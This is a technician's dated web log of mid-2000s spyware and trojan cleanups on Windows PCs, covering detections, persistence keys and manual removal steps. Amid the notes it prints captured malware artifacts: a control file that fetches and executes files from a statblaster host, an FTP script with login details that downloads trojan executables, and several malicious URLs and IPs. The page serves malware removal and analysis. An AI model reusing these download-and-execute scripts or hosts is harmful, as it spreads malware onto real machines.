Spyware, worms and viruses-
03.07.05
Some time ago (09.22.04) I got an email with the subject:
Hi, I sent you an eCard from iGreetings.com
The link in the email did not go to iGreetings.com but to 62.183.48.238
and the file downloaded was not known, so I saved it. It is 76k. (it is no longer available at that ip)
Recently I found it is identified by Symantec as HackTool.proxy
by Kaspersky - Backdoor.Win32.Agent.eg
and trend has this info: HKTL_PROXY.A
The iGreetings.com site has a message indicating that many of these emails were sent out
and that their link would have iGreetings.com in it.
In the file were some URL strings,
if you got to http://62.248.111.22/images/khazana/eudu38c38dd38d9_d882.lst
Address: 62.248.111.22 (unresolved) AS: 62.248.0.0/17 AS11042 Orion Network Systems, Inc. Rockville/Maryland Net 62/8 RIPE-C3 Amsterdam
it displays an address that is in the email header...
Address: 155.230.159.75 (unresolved) AS: 155.230.0.0/16 AS10052 Kyungpook National Univ. Taegu/Taegu-Si Net 155.230/16 KPNU-NET Taegu, Taegu-si @bh.knu.ac.kr
http://133.38.116.198/images/khazana/w_3d82i8sjqas823yal28s38e.asp
Address: 133.38.116.198 resolved to cdsv2.lib.saitama-u.ac.jp AS: 133.38.0.0/16 AS2907 SINET Japan Tokyo/Kanto Net 133/8 JAPAN-INET Tokyo, Kanto
displays text - already exist
02.08.05
Coolwebsearch varient - 2nd removal pass - had system cleaned down to just it three days before.
safe mode, scan with adaware remove 637 objects, skip CWS and host file
Spybot finds n-case, VX2, Huntbar
Trojan Horse Dropper.Small.8.BC - Grisoft AVG anti-virus
triggered on appwrap[1].exe in the IE cache - no other info
CWSredder still crashes, mini removal tool found nothing.
Deleted all new dll files of 218 kb in size,
OBE2DISP.dll and IQ32_32.DLL were in use.
set to delete on reboot with killbox - removed!
Now CWSredder works - no more files found.
Cleared the host file of the references to 69.20.16.183
removed Spyspotter - known to be bogus
http://www.spywarewarrior.com/rogue_anti-spyware.htm
Used Spybot to imunize and add host block list
if re-occurs, load spywareblaster ( javacool)
Full disk scan with adaware.
remove Flashenhancer BHO - XML.dll and
Unknown file in Winsock LSP: c:\programfiles\oemji\oemjisearchplus\sfbnsp.dll
Removed with Hijack this
run WinsockXP - then rentered the DNS setting.
01.04.05
Had a round with VX2 - Look2Me lately and some of the utilities out there did not work. found that two or
three(?) .dll files and a file named guard were active. Every boot the .dll files change their name. Looking
in system32 folder, find the files with the most recent timestamp. Try to copy them to verify they are in use.
Then reboot to a windows install cd and select the recovery console option after setup starts up. Then
navigate to c:\windows\system32 or c:\winnt\system32 and dir using a wildcard * for example dir o6*.dll
or if it is hidden, dir /ah o6*.dll Then rename the file using ren oldname newname.
in same system32 folder:
sdkhk32.exe - infected by Trojan-Downloader.Win32.Agent.ap - size 30kb
lncom.exe - infected by TrojanDownloader.Win32.Small.zc - size 6kb
reginv.dll - infected by Backdoor.Win32.Prorat.19.b - size 21kb
mfcyw.exe - infected by TrojanDownloader.Win32.Agent.ap - size 28kb
winsys.exe - infected by Backdoor.Win32.Prosti.c - size 48kb
in windows
sysbz32.dll - infected by Trojan-Downloader.Win32.Agent.bc
in c:\
stcupdt.exe - infected by Trojan.Win32.SecondThought.bd
in temp:
iinstall.exe - infected by Trojan-Downloader.Win32.IstBar.gen
in IE.content
a.exe - backdoor.Berbew.B
B.exe - a.exe - backdoor.Coreflood
11.11.04
system32\win.dll - Backdoor.Agent.ac (Kaspersky) - Backdoor.Agent.B (symantec)
- Win32.Mersting (ca) - Win32.Mersting will attempt to download an additional dll from a remote site.
The .DLL file, which is copied to the %System% directory with a random filename,
installs itself via the following registry entry:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs=c:\windows\system32\.dll
This means that the specified dll will be loaded by each application running within the current logon session.
system32\hbdkkba.dll - Trojan.Win32.StartPage.ix
Also known as: StartPage-DU (McAfee) , Win32/StartPage.IX (Eset), Win32.Startpage.FZ (ca)
also dropped sp.html in temp that was a search page hijack.
notepad.exe.bak and wmplayer.exe.bak were created at the same time.
when notepad.exe and wmplayer were renamed, they got replaced.
The win.dll stayed in memory and was not visable in safe mode.
The registry key data (c:\windows\system32\win.dll) was gone in safe mode.
Removal sequence was:
removed documents and setting\user\local\temp\sp.html and windows\system32\hbakkba.dll
replaced c:\windows\notepad.exe and c:\program files\windows media player\wmplayer.exe in safe mode.
( This was done because they got touched, scans detected no virus )
removed references to sp.html and hbakkba.dll with Hijackthis
boot to recovery console and rename win.dll
reboot and delete renamed win.dll, remove AppInit_DLLs data with regedit
11.05.04
Found processes navsys32 and msdoc.exe on a system that had sndmon32.exe,
smsc.exe, svchosting.exe and winmon32.exe. They are run as services.
more soon.
06.18.04
I have noticed that Norton Anti-Virus 'File system realtime protection' really slows
down Adaware6 and Spybot 1.3. Right-click on the shield icon in the tray and turn it off
when you scan.
06.12.04
08.20.04
http://www.computing.net/windowsxp/wwwboard/forum/110053.html
How to start Windows in safe mode:
Win98 or ME:
While your computer starts, press and hold the CTRL key until the
Windows Startup menu is displayed. ( EZdrive use f8 )
Select the Safe Mode menu option from the Startup menu, and then press ENTER.
For Windows 2000:
Press the F8 key, as soon as you see the message:
'For troubleshooting and advanced startup options for Windows 2000, press F8'. Then select safe mode.
For Windows XP:
Use the F8 key, tap it on startup until you get the Startup menu, then select safe mode.
How to view hidden files
05.23.04 System was crippled with popups, I will split this out to a new page
but for now:
Notes from basket case - 5/19/04
Celeron700 win98 - multiple popups, multiple trojan processes
A better internet, virtual bouncer, ad destroyer, clearsearch, webhancer
fash.exe - unknown adware
mwsvm.exe
slss
mswspl
pcsvc.exe
Onh3.exe - running in temp, infected system 03/31/04 dll dated 5/19/04
is associated with download.statblaster.com, what appears to be a control file
contains this:
download name="SWall" downloadURL="http://download.statblaster.com/updatestats/MemoryWatcher_b.exe"
execute="true" wait="false" version="1"
download name="SWall2" downloadURL="http://download.statblaster.com/updatestats/all_files9.exe"
execute="true" wait="false" version="1"
download name="SWall3" downloadURL="http://download.statblaster.com/updatestats/tracker9.exe"
execute="true" wait="false" version="1"
download name="SWall4" downloadURL="http://download.statblaster.com/updatestats/FixIt.exe"
execute="true" wait="false" version="1"
rawu.exe - in windows app data
ssdpsrv.exe - TC Media
o.bat file - was on desktop - infamous downloader
robaw16.exe /PC="AM.WILD" /Hideuninstall in windows\system - infected system 05/07/04
Second thought STC hit 5/13 - link was on desktop
process name r83r36t - essthunk.exe in system - Envolo - infected system 05/10/04
owercfgp - pup or Winpup32
seekseek
temporary folder in c:\
424 objects
Apropos plugin still in memory
PC2 - Searchbar, new.net ( Napster, Kazaa had been on it )
USBMMKBD
ICSMRR.exe
BHos OFRG.dll and VERN.dll
Below is a newsgroup hit on some of the files I found.
Note that o.bat tries to run:
install2.exe
infamous_downloader.exe
0021-bdl94126.EXE
CS4P028.exe
~~~pulled from newsgroup~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
run Housecall on-line scan:
http://housecall.trendmicro.com/
Trend Micro detects it as:
This malicious Java script file connects to "ftp://downloads.deult-homepage-network.com"
and attempts to download the following files:
Silent.exe – detected by TREND MICRO as TROJ_STILEN.A
Bs5-nt15v.exe – detected as ADW_BKDSPACE.A
Cs4p028.exe – detected as TROJ_SMALL.GO
0021-bd194126.exe – detected as TROJ_REVOP.A
It also drops the following files on the infected system:
O
O.BAT - Batch file component of the malware. TREND MICRO detects this file as BAT_DEBESKI.B
~~~end newsgroup~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This link describes the O.BAT as slightly different then what I found:
Trend Micro on JS_DEBESKI.B
The O file is an ftp script:
open downloads.default-homepage-network.com
tmpacct
12345
bin
get install2.exe
get infamous_downloader.exe
get 0021-bdl94126.EXE
get CS4P028.exe
bye
...........................................
robert's description - he went to the ftp site
Bugtraq: RE: Still Vulnerable in MSIE
From: Thor Larholm - reference to default-homepage-network.com
Mail Wiper and their "Marketing" techniques - More on default-homepage-network.com
I ran Kaspersky scans on some of the collected files, included is the Ad-aware6 id
Scanned file: essthunk.exe - infected 05/10/04
Ad-aware6 id: PeopleOnPage
essthunk.exe - infected by TrojanDownloader.Win32.Apropo.d
Scanned file: OWERCFGP.exe
Ad-aware6 id: Winpup32
OWERCFGP.exe - infected by TrojanDownloader.Win32.VB.ca
Scanned file: CS4P028.exe
CS4P028.exe - infected by TrojanDownloader.Win32.Small.go
Ad-aware6 id: ClearSearch
Scanned file: infamous_downloader.exe
infamous_downloader.exe - packed with UPX
infamous_downloader.exe - infected by TrojanDownloader.Win32.Small.iq
Scanned file: id53.exe
id53.exe - packed with UPX
id53.exe - infected by Trojan.Win32.SecondThought.l - found in folder named 'installer'
Scanned file: install2.exe - infected system 5/13/04 - also found on same PC
install2.exe - packed with UPX
install2.exe - infected by Trojan.Win32.SecondThought.l
Scanned file: edow.exe - infected system 04/06/04
edow.exe - infected by TrojanDownloader.Win32.QDown.b
Scanned file: 0021-bdl94126.EXE - infected system 5/13/04
Ad-aware6 id: VX2.BetterInternet
0021-bdl94126.EXE - archived by WiseSFX
0021-bdl94126.EXE/WISE0000.BIN - OK
0021-bdl94126.EXE/WISE0001.BIN - OK
0021-bdl94126.EXE/WISE0002.BIN - OK
0021-bdl94126.EXE/WISE0003.BIN - OK
0021-bdl94126.EXE/WISE0004.BIN - OK
0021-bdl94126.EXE/WISE0005.BIN - OK
0021-bdl94126.EXE/WISE0006.BIN - OK
0021-bdl94126.EXE/WISE0007.BIN - infected by TrojanDownloader.Win32.VB.ca
0021-bdl94126.EXE/WISE0007.BIN - infected by TrojanDownloader.Win32.VB.ca
0021-bdl94126.EXE/WISE0008.BIN - packed with UPX
0021-bdl94126.EXE/WISE0008.BIN - infected by Trojan.Win32.Revop.c
Scanned file: sys_ai_client_loader.exe - infected system 02/25/04
sys_ai_client_loader.exe - infected by Trojan.Win32.SecondThought.h
Ad-aware6 id: PeopleOnPage
Scanned file: Overpro323.exe - infected system 4/20/04
Overpro323.exe - archived by NSIS
Overpro323.exe/data0001 - OK
Overpro323.exe/data0002 - OK
Overpro323.exe/data0003 - OK
Overpro323.exe/data0004 - OK
Overpro323.exe/data0005 - infected by TrojanDownloader.Win32.Agent.ac
Overpro323.exe/data0006 - infected by TrojanDownloader.Win32.Turown.h
Overpro323.exe/data0006 - infected by TrojanDownloader.Win32.Turown.h
Overpro323.exe/data0007 - OK
Overpro323.exe/data0008 - infected by TrojanDownloader.Win32.Turown.g
Overpro323.exe/data0008 - infected by TrojanDownloader.Win32.Turown.g
Overpro323.exe/data0009 - OK
Overpro323.exe/data0010 - OK
Overpro323.exe/data0011 - OK
Overpro323.exe/data0012 - infected by TrojanDownloader.Win32.VB.cw
Overpro323.exe/data0012 - infected by TrojanDownloader.Win32.VB.cw
Overpro323.exe/data0013 - OK
Overpro323.exe/data0014 - OK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
In folder STC
Scanned file: Tvm_b5_269.exe
Tvm_b5_269.exe - infected by TrojanDropper.Win32.Small.gj
NAV indentified this as trojan.dropper
Scanned file: April0604_loader.exe
April0604_loader.exe - infected by Trojan.Win32.SecondThought.h
Scanned file: VT02.exe
VT02.exe - packed with ASPack
VT02.exe - infected by Trojan.Win32.Delf.cf
Ad-aware6 id: Win32.Delf.Trojan.A Object recognized
Scanned file: bdl14108.exe
bdl14108.exe - packed with UPX
bdl14108.exe - infected by Trojan.Win32.Revop.c
Scanned file: slmss.exe
slmss.exe - packed with UPX
slmss.exe - infected by Trojan.Win32.SecondThought.a
Ad-aware6 id: AdRotator
Scanned file: ClrSchP070.exe
ClrSchP070.exe - infected by Backdoor.Ruledor.c
Ad-aware6 id: ClearSearch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ad-aware6 scan of collected sample files Using reference-file :01R317 12.06.2004
VX2.BetterInternet Object recognized!
Type : File
Data : 0021-bdl94126.exe
ClearSearch Object recognized!
Type : File
Data : cs4p028.exe
Virtumundo Object recognized!
Type : File
Data : cidrules.dll
PeopleOnPage Object recognized!
Type : File
Data : sys_ai_client_loader.exe
Virtumundo Object recognized!
Type : File
Data : wincore.dll
Virtumundo Object recognized!
Type : File
Data : winupd.dll
Win32.Delf.Trojan.A Object recognized!
Type : File
Data : vt02.exe
FileSize : 201 KB
ClearSearch Object recognized!
Type : File
Data : clrschp070.exe
SecondThought Object recognized!
Type : File
Data : stc.exe
VX2.BetterInternet Object recognized!
Type : File
Data : bdl14108.exe
AdRotator Object recognized!
Type : File
Data : slmss.exe
Other Object recognized!
Type : File
Data : ofrg.dll
OriginalFilename : Favorite.DLL
SecondThought Object recognized!
Type : File
Data : id53.exe
OriginalFilename : spawner.exe
Winpup32 Object recognized!
Type : File
Data : owercfgp.exe
CompanyName : totempole
InternalName : pup
OriginalFilename : pup.exe
ProductName : werule
PeopleOnPage Object recognized!
Type : File
Data : essthunk.exe
05.10.04 Found processes MWSVM.EXE and Slmss.exe running on a system that has serveral other problems.
Identified by Pest patrol as DefaultSearch.SeekSeek, it is a BHO. iic4.exe showed up in temp, it is an Adgoblin,
a popup add server BHO for IE. Also Soa8O.exe was Infected with: Backdoor.VB.nb
and NuzK63G.exe Infected with: Backdoor.VB.oq. These can rename itselves and reinsert into run startup.
03.08.04 Recent viruses I have found on systems includes the Manifest trojan, it was
on a system that had Kazaa installed.
Sophos - Troj/Manifest-A
NAI - ManifestDest
Symantec - W32.Manifest.Trojan
A review of the actual product ??? PCMag - Brett Glass
Another one I found is identified as Backdoor.Afcore.ab by Kaperski
but I can't find any info on it, F-secure has related info but the dll is not the same size and the text string inside is
different. There is some evidence that this can hide in a NTFS stream. I also found a log that was the same name
as the dll, it indicates that applications and website activity is tracked.
fsecure on: rundll32 C:\Windows\system32:qgtoxoi.dll,Uninstall
03.05.04 Found a dll nfzaxgnh.dll - that was IEloader Module - part of a BHO - a writeup of this
and some others that create random names from sysinfo.org is here: BHO information
02.14.04 Compared Adaware6.181 with PestPatrol 4.3.0.8, test was the temp folder from a problem PC.
Adaware found Hotbar, VX2 BetterInternet and IBIS Toolbar, Pest Patrol found EAnthology (SS_UNI~.EXE)
01.23.04 revisit to last month, I collected a suspicious file with the name of 'null'
from c:\. The file contains the string: dst.trafficsyndicate.com/Dnl/T_50047/btiein.cab
which turns out to be known as HuntBar, a search-hijacker - details from and.doxdesk.com
Adaware only saw the registry entries for this (on 12.16.03).
01.20.04
A Highjack this tutorial by Merijn
Been finding lots of new stuff and repeats of old, Gater is now called Claria.
Found msnarrator.exe and mpgcom.dll on a system on 12.31.03, Syamntec called it the Trojan.Narat.
They have since reclassified it as Spyware adware.mpgcom It was in the anti-virus definitions
but they took it out. It can saved by system restore, so it could come back!
On the same system was found start.exe, a browser hijacker - write-up by Pest Patrol
Also runit.exe, a dialer, here is the writeup by Sophos
I have seen the "Viewpoint media player" on several systems, it often has
a "remove only" entry in the installed programs list. Today I found vmpremov.exe
in a temp folder that is signed "Viewpoint Media Player MtsAxInstaller"...I now know that
it is left in temp folder when Viewpoint is removed
I have looked at Viewpoint, the webpage is here Viewpoint
The 3d effect from outside the window is interesting. The program has total write
access to its program folders. Many files are updated and a cache of the viewed animations
is created. MTSDownloadSites.txt indicates it is used all through AOL, other names were
[Adobe][CompuServe][CompuServePublic][NSBeta][NS322][Beta][MSNPromo]
snips from Spyware info forum thread on Viewpoint
~~~~~~~~~~
Viewpoint is a flash-like plugin that displays 3d graphics and other sorts of enhanced advertising.
~~~~~~~~~~
For example, look at this Viewpoint demo: http://www.viewpoint.com/online_ad/demos/nestea/index.html
(only works if you have the player installed)
AT&T incorporates it so that you can view their phones in 3D animation while shopping/browsing their webstore.
It's also used by AIM and AOL v8.0 / v9.0 for their advance chat icon features (which animate in 3D).
~~~~~~~~~~
10.24.03
I cleaned a badly infected XP laptop. Following is info on the things I found.
The whole thing started with a Grokster install on 08.27.03, things got bad
on 10.22.03 and then it was brought to me due to Internet Explorer problems.
I found that it had been redirected for search functions in several ways, Had an number of
added toolbars and a whole slew of monitoring and tracking spyware was loaded.
doxdesk writeup on PeopleOnPage
It ran in the background and was self updating.
doxdesk writeup on ShopAtHomeSelect
ShopAtHomeSelect runs in the background via Isp.dll in windows\system32 folder, it seems to block
Norton Anit-virus live update, when I got rid of it ( in Safe mode ) Liveupdate started running.
doxdesk writeup on TOPicks
doxdesk writeup on ShopNav
The following were not directly connected to the Grokster install.
doxdesk writeup on DownloadWare
doxdesk writeup on BookedSpace
loaded in registry startup, has bsx5.dll and bs3.dll,
BookedSpace/BS2 is silently installed by FreeWire's FreeMP3Player
doxdesk writeup on n-Case by 180solutions.com
May be installed by BookedSpace, 180solutions is also known as Riviera Gold Casino
Look2Me.com is site that seems to be for rating pictures, has other freebies, but...
see what Symantec says
a related one, SimilarSingles.com, plants a file in \system32\ named
msg{5E23A031-574F-489C-9482-9E2730FD559B}0111.dll It's run during startup by InprocServer32
this file is listed by Symantec in the writeup for Look2Me.com
Pestpatrol writeup on Bargain Buddy
Seems to have come with favoriteman
cexx.org on Cydoor
an add cache, appears to be benign add-ware at this point.
Symantec on eBates
adware, collects info, delivers Moemoney
eAccelleration
FileFreedom
IGetNet
IPinsight
My Search, Myway.Mybar
Vx2/e - favoriteman
Webhancer
Network Essentials.sc bar
YoSponge's ip block list
an ip I found in the host file was identified as auto.search.msn.com but is associated with ShopNav.
10.06.03
winactive.exe - component of lop.com,
bviestrt.exe - ???
TRICKL~1.EXE - seems to be associated with gator
qanizjcj.exe - contains string 'Swizz03r Download Agent' turned up one reference in a News group
09.03
spywareinfo.com article on Lop.com
Spyware found on kids computer 04.11.03
I used Spybot search and distroy to get em and provide some descriptions.
I got more info from Adaware6 and www.doxdesk.com. I added the Notes.
At the bottom of the page is some snips from news groups.
Note: this kid likes neopets.com and related seemingly harmeless sites
but many adults would go to twistedhumor.com so...they got this stuff also!
IPinsight
Description
Uses information collected from you to improve their database. The function of this database is not
completely clear, but they will use it to track your location down to your neighbourhood,
including geolocated demographic statistics about you.
Note: Sentry.exe and ipinsigt.dll are part of the install
Privacy Statement
IPinsight Software generates Line Speed, Geography, Gender/Age estimates, User ID, and IP address,
which it transmits to the IPinsight servers for use in the preparation of the company’s data file products.
...
Unique Identifier: IPinsight maintains file integrity through the use of a unique random number (GUID)
for each user, which is stored in the user’s Windows Registry.
...
IP Address: Finally, when you install IPinsight's Software, it collects several bits of information about
the configuration of your computer. This information includes information about the computer's hardware
configuration, such as the amount of free space on your hard drive, and information about the computer's
software configuration, such as the name and version of the operating system.
Whenu.com's Savenow
Functionality
SaveNow wants people in the US help shopping. It wants to give you additional (advertisement)
information whenever you surf, e.g. use a search engine.
Description
Hiding data by misusing a structure in the registry reserved for other stuff doesn't help you trust
a software.
Note: Wusn.1 key found in registry, save.exe is found on disk.
Weathercast is associated with savenow in that it gets installed also.
Privacy Statement
The Internet is an evolving medium and WhenU.com may change its privacy policy from time to time.
Please review the WhenU.com privacy policy often. Use of any WhenU.com product
indicates your knowledge and acceptance of the privacy policy posted on the WhenU.com site
and toolbar at that time.
Gigatech Superbar
Functionality
Fills in names, passwords and form data. Enhanced search functions for IE.
Description
Installs unrequested and without informing the user, for example with the last TwistedHumor comic.
Why a account/password/form filling utility? It has been long ago integrated into IE.
Note: - seems to cause page not found errors
Privacy Statement
Non-existent
Igetnet
Functionality
New search functions for IE
Description
No privacy violation (except keywords are stored in combination with your IP),
but installation removes all other installed BHOs. In addition,
it hijacks the MS search pages to their own homepage.
Note: winstart001.exe is part of install, may cause 'page not found' errors.
and.doxdesk.com info on Igetnet
Favoriteman - detected by Adaware but not Spybot S&D
Description
FavoriteMan is an IE Browser Helper Object, it can install other spyware.
mbr32.dll can be found in windows\system
Note: gig.dll is a renamed version of F1.dll - a known component of Favoriteman
and.doxdesk.com info on Favoriteman
n-case
Functionality
Provides ads.
Privacy Statement
When you register with one of 180Solutions' distribution partners, you may be asked to provide personal
information about yourself and your interests. In some cases, non-personally identifiable information
about you may be passed to us by the partner. This may include, but is not limited to, your age, sex,
geographic region and interests.
[...] When n-CASE is actively running on your computer, the software generates logs of your surfing
activity, including web pages you have visited and the order in which you visited these pages.
These logs are then uploaded to 180Solutions' secure servers. We use these logs for market research
purposes and to provide you with offers and content specifically targeted to your interests and habits.
180Solutions stores these logs on our servers, for our use.
Note: msbb.exe is part of n-case install, stability problems are often introduced by add ware,
so much by this program that it got its own Microsoft Knowledge Base Article - Error Message:
"Msbb.exe has encountered a problem and needs to close..." msbb.exe was attributed to web3000,
then 180solutions and is now identified by Adaware 6 as being the twistedhumor.com 'rich black cartoon'.
http://cexx.org/ claims wsock32.dll file is over-written by msbb.exe
Other people have noticed the spyware
Newsgroups: alt.privacy.spyware
Subject: Re: TwistedHumor and new spyware
On Mon, 30 Dec 2002 04:56:57 GMT, mtubi@python.net (sponge) wrote:
>As a part of my ongoing research, I downloaded and installed
>TwistedHumor's latest cartoon. Talk about spyware! Only KaZaa can top
>this! I counted SEVEN different immediately-identifiable types:
>BargainBuddy, Aornum, IGetNet, IPInsight, SuperBari Installer, WhenU's
>SaveNow, EBates (TopMoxie mod). A few of these are apparently
>previously unidentified, and TwistedHumor does not tell you about all
>of them. The good thing is I got a lot of great data for the Spyware
>Blocklist! Found some new advertisers their spyware talks to as well.
post by James Sullivan in Win98.gen.discussion, 19 October:
wnad.exe = Spyware! http://twistedhumor.com/
My guess is that you installed Yo Mama Osama using 'Osama.exe' from twistedhumor.com
Our 'friends' at twisted humor add this little bit of spyware thatdoesn't unload
when you uninstall 'yo mama osama'. It seems to pop ads up in the background with
out the need for a browser. Nice huh.
This WNAD.EXE program is placed in startup. It is located in the Windows directory and
has the following other files:
wnad.dat, wnad.exe, wnad-update.exe, wnad.lgc
Look here for information about wnad.exe and removal instructions:
http://www.cexx.org/osama.htm
Article on Adware
Spywareinfo on CoolWebSearch
myNetWatchman on Windows PopUP SPAM
Note that grc.com addesses this issue as well
The Official Proxomitron Forum - Hosts file
Hijack This - by Merijn
Spywareinfo.com
Eric Howes' Privacy & Security Page
Cexx.org on NewdotNet
Winpatrol Stats
Trend Micro on JS_DEBESKI.A
|